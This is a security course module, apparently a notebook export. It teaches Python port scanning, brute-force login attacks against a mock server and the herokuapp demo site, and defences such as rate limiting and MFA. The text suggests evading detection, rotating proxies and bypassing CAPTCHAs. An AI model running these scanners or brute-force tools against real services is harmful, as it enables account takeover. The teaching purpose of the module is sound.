
---

## üìÖ Week 9: Python for Security Tasks üêçüîê

**Theme:** Automating cybersecurity with Python scripts

**Goal:** Learn to build security tools like port scanners, brute force engines, and keyloggers

---





---



### üîß Part 1: Port Scanners with Python

---

### üß† 1. What is Port Scanning?

**Port scanning** is a technique used to **discover open ports** and services available on a **networked device or server**.

#### üìå Key Terms:

* **Port**: A communication endpoint (e.g., port 80 for HTTP, port 443 for HTTPS).
* **Open port**: A service is actively listening.
* **Closed port**: Nothing is listening, but it is reachable.
* **Filtered port**: A firewall or rule is blocking the connection, making the port unreachable.

#### üîç Why is it important in FinTech?

FinTech systems (e.g., banking APIs, payment servers) must close all unused ports to avoid:

* Unauthorized access
* Data leaks
* Attacks like port exploitation or DDoS

---

### üîí 2. How Port Scanners Work

When you scan a port:

1. You **send a request** to that port on a server.
2. If it **responds**, the port is likely open.
3. If no response or error, it‚Äôs closed or filtered.

This helps **identify vulnerabilities** in deployed servers or applications.

---

### üöÄ 3. Let‚Äôs Build a Multi-Threaded Port Scanner in Python

Below is a **complete Python script** to scan ports on any target IP address.

```python
# üêç Import the necessary Python libraries
import socket   # used to create network connections
import threading  # used to run multiple port scans at the same time

# üñ•Ô∏è Define the target IP address (You can replace this with any IP or domain)
target = '127.0.0.1'  # This is localhost; you can try 'scanme.nmap.org' or any test server

# üß† Define a function to scan a single port
def scan_port(port):
    try:
        # 1Ô∏è‚É£ Create a socket object (IPv4 + TCP)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        # 2Ô∏è‚É£ Set a timeout for each connection attempt (in seconds)
        sock.settimeout(1)

        # 3Ô∏è‚É£ Try to connect to the target on the current port
        result = sock.connect_ex((target, port))  # Returns 0 if successful

        # 4Ô∏è‚É£ Check if connection was successful (port is open)
        if result == 0:
            print(f"‚úÖ Port {port} is OPEN")  # Inform which port is open

        # 5Ô∏è‚É£ Close the socket after checking
        sock.close()

    except Exception as e:
        # In case any error occurs (e.g., unreachable IP)
        print(f"‚ö†Ô∏è Error scanning port {port}: {str(e)}")

# üöÄ Define a function to scan a range of ports using threads
def run_scanner(start_port, end_port):
    print(f"\nüîç Scanning {target} from port {start_port} to {end_port}...\n")

    # Loop through each port in the given range
    for port in range(start_port, end_port + 1):
        # Create a separate thread for each port scan
        thread = threading.Thread(target=scan_port, args=(port,))
        thread.start()  # Start the thread immediately

# ‚ñ∂Ô∏è Call the scanner with desired port range (1 to 100 is safe to test)
run_scanner(1, 100)
```

---

### ‚úÖ Key Benefits of This Code:

| Feature         | Description                                          |
| --------------- | ---------------------------------------------------- |
| `socket`        | Python's built-in way to handle network connections. |
| `threading`     | Scans multiple ports in parallel = faster scanning.  |
| `.connect_ex()` | Returns 0 if the port is open, else error code.      |
| `settimeout()`  | Avoids the program hanging on unresponsive ports.    |

---

### üß™ Lab Instructions

#### üéØ Objective:

Scan a **local server or test server** for ports 1‚Äì100.

#### üî¨ Steps:

1. Open **Google Colab** or **VSCode**.

2. Paste the above Python code.

3. Replace:

   ```python
   target = '127.0.0.1'
   ```

   with:

   ```python
   target = 'scanme.nmap.org'
   ```

   *(Nmap provides this test host)*

4. Run the code and note which ports are open.

5. Compare results using `nmap` in your Kali Linux terminal:

   ```bash
   nmap -p 1-100 scanme.nmap.org
   ```

---

### ‚öñÔ∏è Comparison with `nmap`

| Tool   | Pros                                  | Cons                    |
| ------ | ------------------------------------- | ----------------------- |
| Python | Fully customizable, good for learning | Slower, basic only      |
| Nmap   | Fast, detailed, service detection     | Not easily customizable |

---

### üè¶ FinTech Scenario Example:

> A FinTech startup is preparing to **launch a mobile banking app**. Before going live, they run this Python scanner on their **API server** to check for any open development/test ports they forgot to close.

---

### üìå Reflection Questions:

1. What happens if you scan a live bank website?
2. Why is port scanning considered a **reconnaissance** step in ethical hacking?
3. How can you enhance this scanner to detect services like HTTP or FTP?

---


**Run The Code:**

In [None]:
!pip install ipywidgets

Collecting jedi>=0.16 (from ipython>=4.0.0->ipywidgets)
  Downloading jedi-0.19.2-py2.py3-none-any.whl.metadata (22 kB)
Downloading jedi-0.19.2-py2.py3-none-any.whl (1.6 MB)
[2K   [90m‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ‚îÅ[0m [32m1.6/1.6 MB[0m [31m17.8 MB/s[0m eta [36m0:00:00[0m
[?25hInstalling collected packages: jedi
Successfully installed jedi-0.19.2


In [None]:
# ================================================
# üîê Week 9 Cybersecurity Lab ‚Äì Python Port Scanner with ipywidgets
# ================================================

# Importing necessary libraries
import socket                        # To create network connections for port scanning
import threading                     # To scan multiple ports in parallel (faster scanning)
from datetime import datetime        # To calculate total scan time
import ipywidgets as widgets         # For interactive widgets (inputs, buttons, etc.)
from IPython.display import display # To display widgets/output in notebooks like Colab/Jupyter

# ---------------------------------------------
# üîå Port Scanning Function ‚Äì Scans a single port
# ---------------------------------------------
def scan_port(target, port, output_box, timeout=1):
    """
    Scans a specific port on the given target.
    If port is open, writes result to output_box.
    """
    try:
        # Create a socket object (IPv4, TCP)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)  # Set timeout for scan attempt (in seconds)

        # Attempt to connect to target on this port
        result = sock.connect_ex((target, port))  # Returns 0 if port is open

        # Print result to output box
        if result == 0:
            output_box.append_stdout(f"‚úÖ Port {port:<5} is OPEN\n")

        sock.close()  # Close connection after checking

    except Exception as e:
        # In case of any unexpected error (e.g., invalid host)
        output_box.append_stdout(f"‚ùå Error scanning port {port}: {e}\n")

# ---------------------------------------------
# üöÄ Main Scanner Function ‚Äì Launches when user clicks the scan button
# ---------------------------------------------
def run_scan(b):
    """
    Triggered when scan button is clicked.
    Retrieves user inputs and starts threaded port scanning.
    """
    output_box.clear_output()  # Clear old output each time button is pressed

    # Get target and port range from widget inputs
    target = target_input.value.strip()
    start_port = int(start_port_input.value)
    end_port = int(end_port_input.value)

    # Display start message
    output_box.append_stdout(f"\nüîç Scanning {target} from port {start_port} to {end_port}...\n")

    # Record start time
    start_time = datetime.now()

    threads = []  # List to keep track of threads

    # Loop through selected port range
    for port in range(start_port, end_port + 1):
        # Create thread to scan this port
        t = threading.Thread(target=scan_port, args=(target, port, output_box))
        threads.append(t)
        t.start()  # Start thread

    # Wait for all threads to complete
    for t in threads:
        t.join()

    # Record end time
    end_time = datetime.now()
    duration = end_time - start_time  # Calculate total scan time

    # Display completion message
    output_box.append_stdout(f"\n‚úÖ Scan completed in {duration}.\n")

# ---------------------------------------------
# üéõÔ∏è Widget Inputs ‚Äì For User Interaction
# ---------------------------------------------

# Text input for domain or IP address
target_input = widgets.Text(
    value='scanme.nmap.org',  # Default value (safe test domain)
    description='Target:',
    placeholder='e.g. scanme.nmap.org or 192.168.1.1',
    style={'description_width': 'initial'},
    layout=widgets.Layout(width='60%')  # Adjust width for better layout
)

# Bounded integer input for start port
start_port_input = widgets.BoundedIntText(
    value=1, min=1, max=65535, step=1,    # Valid port range: 1‚Äì65535
    description='Start Port:',
    style={'description_width': 'initial'}
)

# Bounded integer input for end port
end_port_input = widgets.BoundedIntText(
    value=1024, min=1, max=65535, step=1, # End at 1024 by default (common ports)
    description='End Port:',
    style={'description_width': 'initial'}
)

# Scan button that triggers run_scan()
scan_button = widgets.Button(
    description='üöÄ Start Scan',
    button_style='success',  # Green color
    icon='play'              # Play icon
)
scan_button.on_click(run_scan)  # Connect click to function

# Output widget to show results
output_box = widgets.Output(
    layout={'border': '1px solid black', 'height': '300px', 'overflow_y': 'auto'}
)

# Arrange all widgets in vertical box
ui = widgets.VBox([
    widgets.HTML("<h3>üîê Python Port Scanner ‚Äì Cybersecurity Lab</h3>"),
    widgets.HBox([target_input]),
    widgets.HBox([start_port_input, end_port_input]),
    scan_button,
    output_box
])

# Display the full user interface
display(ui)

VBox(children=(HTML(value='<h3>üîê Python Port Scanner ‚Äì Cybersecurity Lab</h3>'), HBox(children=(Text(value='sc‚Ä¶



---

# üìò 2. Brute Force Scripts with `ftplib`, `requests`, etc.

### üéØ **Objective:**

To understand how brute force attacks work, how they can be automated using Python, and how FinTech systems defend against them using **rate limiting**, **account lockouts**, and **multi-factor authentication**.

---

## üß© 2.1 What is a Brute Force Attack?

A **brute force attack** is a trial-and-error method used to discover passwords or cryptographic keys.
The attacker systematically tries **every possible combination** of credentials until access is granted.

üí¨ **Simple Definition:**

> ‚ÄúKeep guessing until you get it right.‚Äù

---

### üß† How It Works

1. The attacker obtains a **login interface** (FTP server, admin panel, API, or web form).
2. They prepare a **list of usernames and passwords** (called a **wordlist**).
3. The attacker writes a **script** (in Python or other languages) that repeatedly sends login requests using each combination.
4. If one response indicates ‚ÄúLogin successful‚Äù, the correct password has been found.

---

### üí° Common Targets

| Target Type                | Example               | Description                                             |
| -------------------------- | --------------------- | ------------------------------------------------------- |
| **FTP Servers**            | `ftplib`              | Attackers try to connect via the File Transfer Protocol |
| **Web Login Forms**        | `requests`            | Automated POST requests to web pages                    |
| **SSH Servers**            | `paramiko`            | Scripted SSH brute-force attempts                       |
| **APIs / FinTech Portals** | `requests`, `aiohttp` | Guessing credentials or tokens on API endpoints         |

---

## üîç 2.2 Brute Force in FinTech Context

FinTech platforms (like online banking, wallets, and trading systems) rely heavily on user authentication.
Brute-force attacks can:

* Compromise **customer accounts**
* Drain wallets or perform **unauthorized fund transfers**
* Expose **sensitive financial data**

For example:

* Attackers might target **login forms of mobile wallet APIs**.
* Automated scripts can send **hundreds of login requests per second**.
* If proper defenses aren‚Äôt implemented, **accounts can be breached**.

---

## ‚öôÔ∏è 2.3 Python Libraries Used

| Library        | Purpose                                   | Example Usage                                         |
| -------------- | ----------------------------------------- | ----------------------------------------------------- |
| **`ftplib`**   | Connect to FTP servers and attempt logins | `ftp.login(user, password)`                           |
| **`requests`** | Send POST requests to web login forms     | `requests.post(url, data={'user': 'a', 'pass': 'b'})` |
| **`paramiko`** | SSH connection testing                    | `ssh.connect(host, username, password)`               |

These libraries make it possible to **automate login attempts** and simulate brute-force scenarios.

---

## üîë 2.4 Types of Brute Force Attacks

| Type                    | Description                                   | Example                         |
| ----------------------- | --------------------------------------------- | ------------------------------- |
| **Simple Brute Force**  | Trying every possible combination (slowest).  | aaaa ‚Üí aaab ‚Üí aaac ...          |
| **Dictionary Attack**   | Using a list of likely passwords.             | ‚Äú123456‚Äù, ‚Äúadmin‚Äù, ‚Äúwelcome‚Äù    |
| **Hybrid Attack**       | Combines dictionary with variations.          | ‚ÄúAdmin123‚Äù, ‚ÄúPass@2024‚Äù         |
| **Credential Stuffing** | Reusing stolen credentials from another site. | Using old leaked password lists |

---

## üß™ 2.5 Lab Focus: Brute-Force a Mock Web Login Form

In this lab, you‚Äôll:

* Simulate a **login page** (a test endpoint like `https://example.com/login`)
* Use Python‚Äôs **`requests`** module to send repeated login attempts
* Try different passwords from a **wordlist**
* Observe how login success/failure is determined
* Learn how real servers detect and block such attempts

---

### üß∞ Example Login Workflow

1. **Form submission (POST request):**

   ```python
   requests.post("https://example.com/login", data={'username': 'admin', 'password': '1234'})
   ```

2. **Server response (simplified):**

   * `"Invalid credentials"` ‚Üí Wrong password
   * `"Welcome admin!"` ‚Üí Correct password found

3. **Automation:**

   * Use a loop to try multiple passwords until success message is detected.

---

## üß† 2.6 Why This Is Dangerous (Real-World Risks)

* FinTech platforms often use public APIs and web apps that are accessible worldwide üåç
* Without **account lockouts or CAPTCHAs**, anyone can run a brute-force script 24/7
* Weak passwords (like ‚Äú123456‚Äù or ‚Äúadmin‚Äù) are guessed in seconds
* Attackers can use botnets to avoid IP bans or rate-limits

---

## üõ°Ô∏è 2.7 Defense Mechanisms

### üß± **1. Rate Limiting**

* Restricts how many login attempts can be made per minute.
* Example: Allow max 3 attempts per IP every 10 seconds.
* Implemented in APIs and login endpoints.

üß© *Python implementation idea (on server side):*

```python
if login_attempts_from_ip > 5:
    return "Too many requests. Try again later."
```

---

### üîí **2. Account Lockout**

* Temporarily disables an account after several failed login attempts.
* Common configuration: lock for 15 minutes after 5 failed attempts.
* Protects users from repeated brute-force attacks.

‚ö†Ô∏è Trade-off: Attackers can **intentionally lock users out** by sending fake failed attempts ‚Äî a **Denial of Service (DoS)** side effect.

---

### üì≤ **3. CAPTCHA / reCAPTCHA**

* Adds a human verification step to prevent automated attacks.
* Used by banking portals and FinTech apps during login or signup.

---

### üßç‚Äç‚ôÇÔ∏è **4. Multi-Factor Authentication (MFA)**

* Requires an extra authentication factor (OTP, token, biometric).
* Even if password is brute-forced, attacker can‚Äôt log in without the second factor.

---

### üß∞ **5. Monitoring and Logging**

* Detect abnormal login patterns like:

  * Too many failed attempts from same IP
  * Login attempts on inactive accounts
* Security Information and Event Management (SIEM) tools detect these patterns.

---

## üßÆ 2.8 FinTech Example Scenarios

| Scenario                         | Description                                                                      |
| -------------------------------- | -------------------------------------------------------------------------------- |
| üí≥ **Mobile wallet brute-force** | Attackers target users of a wallet app with weak passwords.                      |
| üè¶ **Bank web portal attack**    | Repeated POST requests to login API using stolen password lists.                 |
| üîê **Internal system testing**   | Ethical hackers simulate attacks on development servers to ensure lockouts work. |

---

## ‚úÖ 2.9 Summary

| Concept                | Key Takeaway                                                  |
| ---------------------- | ------------------------------------------------------------- |
| **Brute Force Attack** | Trying multiple passwords until success                       |
| **Python Tools**       | `requests`, `ftplib`, `paramiko`                              |
| **FinTech Relevance**  | Common in login and API abuse                                 |
| **Defense**            | Rate limiting, account lockouts, CAPTCHA, MFA                 |
| **Ethical Rule**       | Only test systems you own or have explicit permission to test |

---

## üß© 2.10 Reflection Questions

1. What makes brute force attacks successful on weakly protected systems?
2. How can FinTech systems balance usability (fewer restrictions) and security (strict lockouts)?
3. Why is **rate limiting** critical in API-based financial apps?
4. How could you modify your brute-force script to avoid detection? (and why shouldn‚Äôt you in real life?)
5. What would be the **ethical** way to test a banking API for brute-force resilience?

---





---

# üß™ Week 9 ‚Äì Lab 2: Brute Force Login Simulation (Educational Use Only)

### Topic: `requests`, `ftplib`, and Rate Limiting Concepts

---

```python
# ============================================================
# üß† Week 9 Lab ‚Äì Brute Force Login Simulator (Python + ipywidgets)
# ============================================================
# ‚ö†Ô∏è EDUCATIONAL PURPOSES ONLY!
# Do NOT use this script on real websites or systems without explicit permission.
# This lab demonstrates how brute-force attacks work and how defenses like
# rate-limiting and account lockouts help protect FinTech systems.
# ============================================================

# ---------------------------------
# üì¶ Import required libraries
# ---------------------------------
import requests                          # For sending HTTP POST requests to web login forms
import ipywidgets as widgets             # For interactive widgets (buttons, inputs, etc.)
from IPython.display import display      # For displaying widgets and outputs
from time import sleep                   # To simulate rate-limiting between attempts
import random                            # To simulate server response randomness

# ---------------------------------
# üß© Function: Simulated Server Response
# ---------------------------------
def mock_login_server(username, password):
    """
    Simulates a mock web login system for demonstration.
    In real life, this would be a remote web server with actual credentials.
    """
    # Pretend that the real username is "admin" and password is "welcome123"
    correct_username = "admin"
    correct_password = "welcome123"

    # If both are correct ‚Üí authentication successful
    if username == correct_username and password == correct_password:
        return "Welcome admin!"

    # Randomly simulate server delay to make it realistic
    sleep(random.uniform(0.2, 0.5))
    return "Invalid credentials. Try again."

# ---------------------------------
# üöÄ Function: Brute Force Attack Simulator
# ---------------------------------
def brute_force_attack(b):
    """
    This function simulates a brute-force login attack using multiple password attempts.
    It reads user input from ipywidgets and prints results in real time.
    """

    # Clear old output each time button is pressed
    output_box.clear_output()

    # Get values from widgets
    target_url = url_input.value.strip()         # Target (for display only)
    username = username_input.value.strip()      # Username to attack
    passwords = passwords_input.value.splitlines()  # Password list (from textarea)

    # Print starting message
    output_box.append_stdout(f"\nüöÄ Starting brute-force simulation on {target_url}\n")
    output_box.append_stdout(f"üë§ Username: {username}\n")
    output_box.append_stdout(f"üî¢ Total passwords to try: {len(passwords)}\n\n")

    found = False        # Flag for success
    attempt_count = 0    # Counter for number of tries

    # Simulated rate limiting variables
    RATE_LIMIT = 3       # After 3 failed attempts, impose cooldown
    COOLDOWN = 5         # Wait 5 seconds to simulate server lockout

    # Start brute-force loop
    for password in passwords:
        attempt_count += 1
        password = password.strip()

        # Simulate "sending" login request
        # (Here we use mock_login_server, but in a real test: requests.post(target_url, data={'username': username, 'password': password}))
        response = mock_login_server(username, password)

        # Print each attempt result
        output_box.append_stdout(f"üîë Attempt {attempt_count}: {password} ‚Üí ")

        # If correct password found
        if "Welcome" in response:
            output_box.append_stdout(f"‚úÖ SUCCESS! Password = {password}\n")
            found = True
            break
        else:
            output_box.append_stdout(f"‚ùå Failed\n")

        # Simulate rate-limiting behavior
        if attempt_count % RATE_LIMIT == 0:
            output_box.append_stdout(f"‚è≥ Too many attempts! Server cooling down for {COOLDOWN}s...\n")
            sleep(COOLDOWN)  # Pause before next group of attempts

    # Final output summary
    if not found:
        output_box.append_stdout("\n‚ùå No valid password found. Account remains locked.\n")
    else:
        output_box.append_stdout("\nüéâ Simulation complete! Password successfully discovered.\n")

# ---------------------------------
# üéõÔ∏è WIDGETS ‚Äì Interactive User Inputs
# ---------------------------------

# Input for mock login target (for display only)
url_input = widgets.Text(
    value='https://mockbank.com/login',
    description='Target URL:',
    style={'description_width': 'initial'},
    layout=widgets.Layout(width='70%')
)

# Username input box
username_input = widgets.Text(
    value='admin',
    description='Username:',
    style={'description_width': 'initial'}
)

# Text area for password list (wordlist)
passwords_input = widgets.Textarea(
    value='123456\npassword\nadmin\nwelcome\nwelcome123\nadmin@2024',
    description='Passwords (one per line):',
    layout=widgets.Layout(width='70%', height='130px'),
    style={'description_width': 'initial'}
)

# Run button
start_button = widgets.Button(
    description='üöÄ Start Simulation',
    button_style='danger',    # Red button for emphasis
    icon='skull-crossbones'   # Adds skull icon for demo
)

# Output box for showing results
output_box = widgets.Output(
    layout={'border': '1px solid black', 'height': '300px', 'overflow_y': 'auto'}
)

# Connect button to brute_force_attack() function
start_button.on_click(brute_force_attack)

# ---------------------------------
# üß† Combine all widgets into a clean layout
# ---------------------------------
ui = widgets.VBox([
    widgets.HTML("<h3>üîê Python Brute Force Login Simulator (Educational Use Only)</h3>"),
    widgets.HTML("<p>This demo shows how brute force attacks test multiple passwords until one succeeds.<br><b>Important:</b> Never use this on real systems!</p>"),
    url_input,
    username_input,
    passwords_input,
    start_button,
    output_box
])

# ---------------------------------
# üéØ Display the interactive interface
# ---------------------------------
display(ui)
```

---

## üß† How It Works

| Step   | Explanation                                                                                                      |
| ------ | ---------------------------------------------------------------------------------------------------------------- |
| **1.** | The mock server (`mock_login_server`) imitates how a web login system responds to valid/invalid credentials.     |
| **2.** | The `brute_force_attack()` function simulates multiple login attempts using a provided list of passwords.        |
| **3.** | After a few failed attempts, a **cooldown** (rate limiting) is triggered to mimic real FinTech security systems. |
| **4.** | The script stops when the correct password (`welcome123`) is found.                                              |
| **5.** | Everything is displayed in real time via `ipywidgets.Output()`.                                                  |

---

## üß© Output Example

```
üöÄ Starting brute-force simulation on https://mockbank.com/login
üë§ Username: admin
üî¢ Total passwords to try: 6

üîë Attempt 1: 123456 ‚Üí ‚ùå Failed
üîë Attempt 2: password ‚Üí ‚ùå Failed
üîë Attempt 3: admin ‚Üí ‚ùå Failed
‚è≥ Too many attempts! Server cooling down for 5s...
üîë Attempt 4: welcome ‚Üí ‚ùå Failed
üîë Attempt 5: welcome123 ‚Üí ‚úÖ SUCCESS! Password = welcome123

üéâ Simulation complete! Password successfully discovered.
```

---


**Run The Code:**

In [None]:
# ============================================================
# üß† Week 9 Lab ‚Äì Brute Force Login Simulator (Python + ipywidgets)
# ============================================================
# ‚ö†Ô∏è EDUCATIONAL PURPOSES ONLY!
# Do NOT use this script on real websites or systems without explicit permission.
# This lab demonstrates how brute-force attacks work and how defenses like
# rate-limiting and account lockouts help protect FinTech systems.
# ============================================================

# ---------------------------------
# üì¶ Import required libraries
# ---------------------------------
import requests                          # For sending HTTP POST requests to web login forms
import ipywidgets as widgets             # For interactive widgets (buttons, inputs, etc.)
from IPython.display import display      # For displaying widgets and outputs
from time import sleep                   # To simulate rate-limiting between attempts
import random                            # To simulate server response randomness

# ---------------------------------
# üß© Function: Simulated Server Response
# ---------------------------------
def mock_login_server(username, password):
    """
    Simulates a mock web login system for demonstration.
    In real life, this would be a remote web server with actual credentials.
    """
    # Pretend that the real username is "admin" and password is "welcome123"
    correct_username = "admin"
    correct_password = "welcome123"

    # If both are correct ‚Üí authentication successful
    if username == correct_username and password == correct_password:
        return "Welcome admin!"

    # Randomly simulate server delay to make it realistic
    sleep(random.uniform(0.2, 0.5))
    return "Invalid credentials. Try again."

# ---------------------------------
# üöÄ Function: Brute Force Attack Simulator
# ---------------------------------
def brute_force_attack(b):
    """
    This function simulates a brute-force login attack using multiple password attempts.
    It reads user input from ipywidgets and prints results in real time.
    """

    # Clear old output each time button is pressed
    output_box.clear_output()

    # Get values from widgets
    target_url = url_input.value.strip()         # Target (for display only)
    username = username_input.value.strip()      # Username to attack
    passwords = passwords_input.value.splitlines()  # Password list (from textarea)

    # Print starting message
    output_box.append_stdout(f"\nüöÄ Starting brute-force simulation on {target_url}\n")
    output_box.append_stdout(f"üë§ Username: {username}\n")
    output_box.append_stdout(f"üî¢ Total passwords to try: {len(passwords)}\n\n")

    found = False        # Flag for success
    attempt_count = 0    # Counter for number of tries

    # Simulated rate limiting variables
    RATE_LIMIT = 3       # After 3 failed attempts, impose cooldown
    COOLDOWN = 5         # Wait 5 seconds to simulate server lockout

    # Start brute-force loop
    for password in passwords:
        attempt_count += 1
        password = password.strip()

        # Simulate "sending" login request
        # (Here we use mock_login_server, but in a real test: requests.post(target_url, data={'username': username, 'password': password}))
        response = mock_login_server(username, password)

        # Print each attempt result
        output_box.append_stdout(f"üîë Attempt {attempt_count}: {password} ‚Üí ")

        # If correct password found
        if "Welcome" in response:
            output_box.append_stdout(f"‚úÖ SUCCESS! Password = {password}\n")
            found = True
            break
        else:
            output_box.append_stdout(f"‚ùå Failed\n")

        # Simulate rate-limiting behavior
        if attempt_count % RATE_LIMIT == 0:
            output_box.append_stdout(f"‚è≥ Too many attempts! Server cooling down for {COOLDOWN}s...\n")
            sleep(COOLDOWN)  # Pause before next group of attempts

    # Final output summary
    if not found:
        output_box.append_stdout("\n‚ùå No valid password found. Account remains locked.\n")
    else:
        output_box.append_stdout("\nüéâ Simulation complete! Password successfully discovered.\n")

# ---------------------------------
# üéõÔ∏è WIDGETS ‚Äì Interactive User Inputs
# ---------------------------------

# Input for mock login target (for display only)
url_input = widgets.Text(
    value='https://mockbank.com/login',
    description='Target URL:',
    style={'description_width': 'initial'},
    layout=widgets.Layout(width='70%')
)

# Username input box
username_input = widgets.Text(
    value='admin',
    description='Username:',
    style={'description_width': 'initial'}
)

# Text area for password list (wordlist)
passwords_input = widgets.Textarea(
    value='123456\npassword\nadmin\nwelcome\nwelcome123\nadmin@2024',
    description='Passwords (one per line):',
    layout=widgets.Layout(width='70%', height='130px'),
    style={'description_width': 'initial'}
)

# Run button
start_button = widgets.Button(
    description='üöÄ Start Simulation',
    button_style='danger',    # Red button for emphasis
    icon='skull-crossbones'   # Adds skull icon for demo
)

# Output box for showing results
output_box = widgets.Output(
    layout={'border': '1px solid black', 'height': '300px', 'overflow_y': 'auto'}
)

# Connect button to brute_force_attack() function
start_button.on_click(brute_force_attack)

# ---------------------------------
# üß† Combine all widgets into a clean layout
# ---------------------------------
ui = widgets.VBox([
    widgets.HTML("<h3>üîê Python Brute Force Login Simulator (Educational Use Only)</h3>"),
    widgets.HTML("<p>This demo shows how brute force attacks test multiple passwords until one succeeds.<br><b>Important:</b> Never use this on real systems!</p>"),
    url_input,
    username_input,
    passwords_input,
    start_button,
    output_box
])

# ---------------------------------
# üéØ Display the interactive interface
# ---------------------------------
display(ui)


VBox(children=(HTML(value='<h3>üîê Python Brute Force Login Simulator (Educational Use Only)</h3>'), HTML(value=‚Ä¶

**Real Version:**



---

# üîê Brute-Force Login GUI Tool (Educational Only)

> üõ°Ô∏è **Disclaimer:** This tool is for educational use **only**. Do **not** test any system you don‚Äôt have **permission** for. Use on public demo sites or your **own local server**.

---

## üì¶ What Is This Tool?

This Python script is a **Brute-Force Login Simulator**. It tries different passwords (one by one) for a specific username and checks if login is successful.

---

## ‚úÖ What This Tool Can Do:

* üñ•Ô∏è Runs on your own computer using a GUI (Tkinter)
* üîê Sends login requests to a given website
* ‚å®Ô∏è Tries a list of passwords for one username
* ‚úÖ Detects login success by checking for a **keyword** or **URL change**
* üïí Adds delay between attempts to avoid spamming
* üìã Shows logs of each try
* üìÑ Can export all attempts as a CSV file

---

## üöÄ How to Use It

### üõ†Ô∏è Step 1: Requirements

You only need Python and Tkinter (comes with Python).

### üß™ Step 2: Download or Copy the Code

Save this file as:

```bash
brute_gui_structured.py
```

Or get the latest version from your repository if you‚Äôve pushed it.

---

### ‚ñ∂Ô∏è Step 3: Run the App

Open **Spyder**, **VS Code**, or any IDE on your computer and run:

```bash
python brute_gui_structured.py
```

A GUI window will appear like this:

```
+-------------------------------+
| üîê Brute-Force Login Tool     |
| Target URL: _________________ |
| Username: tomsmith            |
| Password List:                |
| - 123456                      |
| - admin                      |
| - SuperSecretPassword!       |
| ...                          |
| Delay: 0.5s                   |
| [ Type I_HAVE_PERMISSION ]   |
| [üöÄ Run Brute-Force]          |
+-------------------------------+
|         Logs & Status        |
|  [JSON logs appear here]     |
+-------------------------------+
```

---

### üåê Step 4: Test on a Demo Site

You can safely test this on:

üîó **Test Site**: [https://the-internet.herokuapp.com/login](https://the-internet.herokuapp.com/login)

**Correct credentials** for testing:

```plaintext
Username: tomsmith
Password: SuperSecretPassword!
```

‚úÖ Set the **Target URL** to:

```
https://the-internet.herokuapp.com/authenticate
```

üìå Because the login **form sends POST request** to `/authenticate` (not `/login`).

Set **Success keyword** to something like:

```
You logged into a secure area!
```

---

### üí• Step 5: Run It!

1. Type: `I_HAVE_PERMISSION` (required).
2. Press the **üöÄ Run Brute-Force** button.
3. The tool will try passwords one-by-one.
4. When it finds the right password, you‚Äôll see:

```
‚úÖ SUCCESS detected on attempt 4 (password: SuperSecretPassword!)
```

5. It will ask you: **"Do you want to export the results to CSV?"**

---

## üß† How It Works (Behind the Scenes)

| Step | What Happens                                      |
| ---- | ------------------------------------------------- |
| 1Ô∏è‚É£  | Reads your inputs (URL, username, passwords)      |
| 2Ô∏è‚É£  | Connects to the target using `requests.Session()` |
| 3Ô∏è‚É£  | Tries each password with the given username       |
| 4Ô∏è‚É£  | Checks if success keyword or redirect is found    |
| 5Ô∏è‚É£  | Logs each result with timestamp                   |
| 6Ô∏è‚É£  | Stops when success is found or list ends          |

---

## üìã Features Summary

| Feature           | Explanation                                               |
| ----------------- | --------------------------------------------------------- |
| ‚úÖ Success Check   | By keyword OR redirect (`/secure`)                        |
| üîÅ Allow Redirect | Follows redirect after login                              |
| üß™ Delay          | Slows down attempts (e.g. 0.5s)                           |
| ü™™ Headers        | You can add custom headers (e.g., CSRF token, User-Agent) |
| üì• Export         | After success, logs are saved as CSV                      |
| üîê CSRF Support   | Optional: extracts token using regex                      |
| üö´ Safety Lock    | Won‚Äôt run unless `I_HAVE_PERMISSION` is typed             |
| üí¨ GUI Logs       | Every action shown in real-time logs                      |


---

## ‚ö†Ô∏è Final Reminders

| ‚ùó Rule        | üìå Details                                                                                         |
| ------------- | -------------------------------------------------------------------------------------------------- |
| üëÆ Legal      | Never use this tool on real sites or networks without permission                                   |
| üß™ Practice   | Only use on [Heroku test site](https://the-internet.herokuapp.com/login) or your own               |
| üíª Local Test | You can build your own local login form with Flask/Django                                          |
| üìö Learn      | Modify it to add new features like rotating proxies, multiple users, or CAPTCHA bypass (simulated) |

---





```python
# ============================================================
# üîê Brute-Force Login Tool (Interactive, Educational Only)
# Author: Usama Arshad | For classroom demonstration/testing
# Target Example: https://the-internet.herokuapp.com/login
# ============================================================

import tkinter as tk                                # built-in GUI library
from tkinter import scrolledtext, messagebox, filedialog  # GUI widgets and dialogs
import requests                                     # HTTP client for requests
import threading                                    # run network work without freezing GUI
import time                                         # for delays and timestamps
import json                                         # formatting logs as JSON-like
import re                                           # regex for optional CSRF token extraction
import traceback                                    # pretty print exception traces
import csv                                          # CSV export of attempts
from datetime import datetime                       # human readable timestamps

# ---------------------------
# Utility: format current timestamp (ISO-like)
# ---------------------------
def now_ts():                                        # returns current timestamp string
    return datetime.utcnow().isoformat(sep=' ', timespec='seconds')  # UTC timestamp, readable

# ---------------------------
# Append structured log entry to GUI log area
# ---------------------------
def append_log_structured(level, message, **meta):  # level e.g., INFO, WARN, ERROR
    ts = now_ts()                                   # current timestamp
    # build structured dict to log
    entry = {"ts": ts, "level": level, "message": message}
    entry.update(meta)                              # add any extra metadata fields
    line = json.dumps(entry, ensure_ascii=False)    # convert to compact JSON string
    # write to log area (thread-safe within Tkinter single thread context via .after)
    log_area.configure(state='normal')              # enable edit
    log_area.insert(tk.END, line + "\n")            # append line
    log_area.configure(state='disabled')            # disable edit
    log_area.see(tk.END)                            # scroll to bottom
    # also append to attempts list if it's an attempt record
    if meta.get("attempt_no") is not None:
        attempts_records.append(entry)              # store for summary/CSV

# ---------------------------
# Safely parse headers JSON entered by the user
# ---------------------------
def safe_parse_headers(text):                       # returns dict or empty dict on error
    if not text or not text.strip():                # empty input -> no headers
        return {}
    try:
        parsed = json.loads(text)                   # try parse JSON
        return parsed if isinstance(parsed, dict) else {}  # ensure dict
    except Exception:
